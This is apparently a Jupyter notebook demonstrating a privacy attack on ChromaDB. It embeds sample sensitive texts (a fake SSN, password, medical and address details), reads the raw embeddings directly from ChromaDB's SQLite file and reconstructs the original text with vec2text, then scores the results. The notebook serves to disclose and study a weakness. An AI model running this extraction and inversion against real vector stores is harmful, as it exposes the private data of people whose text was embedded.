# ChromaDB + Vec2Text Vulnerability Demonstration

This notebook shows how sensitive data stored in ChromaDB can be reconstructed using vec2text
 
### Attack Chain:
1. Sensitive texts → OpenAI embeddings → ChromaDB storage
2. Extract embeddings from SQLite database
3. Use vec2text to reconstruct original sensitive text

In [None]:
# 1. Set up OpenAI embedding & vec2text corrector models

import vec2text
from openai import OpenAI

# ANSI color codes for live demo
class Colors:
    RED = '\033[91m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    END = '\033[0m'

def print_colored(text, color="", bold=False):
    """Print colored text for demo"""
    prefix = Colors.BOLD if bold else ""
    prefix += getattr(Colors, color.upper(), "")
    print(f"{prefix}{text}{Colors.END}")

# OpenAI setup
embedding_model = "text-embedding-ada-002"
client = OpenAI()

# Load vec2text corrector for inversion
print(f"Loading vec2text corrector for OpenAI {embedding_model}...")
corrector = vec2text.load_pretrained_corrector("text-embedding-ada-002")

In [None]:
# 2. Set up ChromaDB

import chromadb

# ChromaDB setup
persist_directory = "./chromadb_vuln_demo"
chroma_client = chromadb.PersistentClient(path=persist_directory)

# Create or reset collection
try:
    chroma_client.delete_collection("sensitive_docs")
except:
    pass
collection = chroma_client.create_collection("sensitive_docs")

print(f"ChromaDB storage location: {persist_directory}")

In [None]:
# 3. Define sensitive documents for demo

sensitive_documents = [
    # Financial/Identity Information
    "My social security number is 818-88-8118",
    "Password for admin account is SecurePass123!",
    
    # Medical Information
    "Patient diagnosed with Type 2 diabetes, prescribed metformin",
    "Blood test results show cholesterol level of 277 mg/dL",
    
    # Personal Information
    "John Doe lives at 1 World Trade Center, New York, NY 10007",
]

In [None]:
# 4. Generate embeddings & store in ChromaDB

print("="*80)
print_colored("GENERATING EMBEDDINGS FROM SENSITIVE DOCUMENTS", bold=True)
print("="*80 + "\n")

def get_embeddings_openai(text_list):
    """Get embeddings from OpenAI API"""
    response = client.embeddings.create(
        input=text_list,
        model=embedding_model,
        encoding_format="float",
    )
    return [e.embedding for e in response.data]

# Get embeddings
embeddings = get_embeddings_openai(sensitive_documents)
print(f"Generated {len(embeddings)} embeddings of dimension {len(embeddings[0])}")

# Store in ChromaDB
collection.add(
    documents=sensitive_documents,
    embeddings=embeddings,
    ids=[f"sensitive_doc_{i}" for i in range(len(sensitive_documents))],
    metadatas=[{"type": "sensitive", "doc_num": i} for i in range(len(sensitive_documents))]
)

In [None]:
# 5. Extract embeddings from ChromaDB SQLite backend

import sqlite3
import struct
import os

print("="*80)
print_colored("EXTRACTING EMBEDDINGS FROM CHROMADB SQLITE BACKEND", bold=True)
print("="*80 + "\n")

# Connect to ChromaDB's SQLite database
db_path = os.path.join(persist_directory, "chroma.sqlite3")
conn = sqlite3.connect(db_path)
cursor = conn.cursor()

print(f"Connected to SQLite database: {db_path}")

# Get embedding data from database
cursor.execute("SELECT * FROM embeddings_queue ORDER BY seq_id")
rows = cursor.fetchall()

print(f"Found {len(rows)} embedding records in database\n")

# Extract embeddings
extracted_embeddings = []
for i, row in enumerate(rows):
    # Parse embedding (float32 binary data)
    doc_id = row[4]  # Document ID
    embedding_blob = row[5]  # Binary embedding data
    num_floats = len(embedding_blob) // 4
    embedding_values = struct.unpack(f'{num_floats}f', embedding_blob)
    extracted_embeddings.append(list(embedding_values))
    
    print_colored(f"Extracted embedding {i+1} corresponding to {doc_id}; {len(embedding_values)} dimensions", "RED")

In [None]:
# 6. Convert to PyTorch & invert each embedding

import time
import torch

# Convert to PyTorch tensor on accelerated hardware if possible
embeddings_tensor = torch.tensor(extracted_embeddings, dtype=torch.float32)
if torch.backends.mps.is_available():
    embeddings_tensor = embeddings_tensor.to('mps')
elif torch.cuda.is_available():
    embeddings_tensor = embeddings_tensor.cuda()

results = []

print("="*80)
print_colored("RUNNING EMBEDDING INVERSION", bold=True)
print("="*80)

# for i, (original_doc, embedding) in enumerate(zip(extracted_documents, embeddings_tensor)):
for i, (original_doc, embedding) in enumerate(zip(sensitive_documents, embeddings_tensor)):
    print_colored(f"\nDocument #{i+1}:", bold=True)
    print(f"\nOriginal:      \"{original_doc}\"")
    
    start_time = time.time()
    
    # Invert embedding
    reconstructed_list = vec2text.invert_embeddings(
        embeddings=embedding.unsqueeze(0),  # Add batch dimension
        corrector=corrector,
        num_steps=4,
        sequence_beam_width=1,
    )
    reconstructed = reconstructed_list[0]
    
    inversion_time = time.time() - start_time

    print(f"Reconstructed: \"{reconstructed}\"")
        
    # Calculate similarity
    if len(reconstructed) > 0:
        orig_emb_cpu = embedding.cpu()
        new_emb = get_embeddings_openai([reconstructed])[0]
        new_emb_tensor = torch.tensor(new_emb)
        similarity = torch.nn.functional.cosine_similarity(orig_emb_cpu, new_emb_tensor, dim=0).item()
    else:
        similarity = 0
    
    # Check exact match
    exact_match = original_doc.lower().strip() == reconstructed.lower().strip()

    if exact_match:
        print_colored(f"Exact match", "RED", bold=True)
    
    sim_color = "RED" if similarity > 0.99 else "YELLOW" if similarity > 0.95 else "GREEN"
    print_colored(f"Similarity: {similarity:.4f}", sim_color, bold=True)
    print(f"Inversion time: {inversion_time:.2f}s")

    results.append({
        'original': original_doc,
        'reconstructed': reconstructed,
        'similarity': similarity,
        'time': inversion_time,
        'exact_match': exact_match,
    })

In [None]:
# 7. Summary Analysis

import numpy as np

print("\n" + "="*80)
print_colored("VULNERABILITY SUMMARY", bold=True)
print("="*80 + "\n")

total_docs = len(results)
exact_matches = sum(1 for r in results if r['exact_match'])
high_similarity = sum(1 for r in results if r['similarity'] > 0.95)

print(f"Total documents processed: {total_docs}")
print(f"Exact reconstructions: {exact_matches} ({exact_matches/total_docs*100:.1f}%)")
print(f"High similarity (>95%): {high_similarity} ({high_similarity/total_docs*100:.1f}%)")

avg_similarity = np.mean([r['similarity'] for r in results])
avg_time = np.mean([r['time'] for r in results])
sim_color = "RED" if avg_similarity > 0.99 else "YELLOW" if avg_similarity > 0.95 else "GREEN"

print_colored(f"Average similarity: {avg_similarity*100:.2f}%", sim_color, bold=True)
print(f"Average inversion time: {avg_time:.2f}s")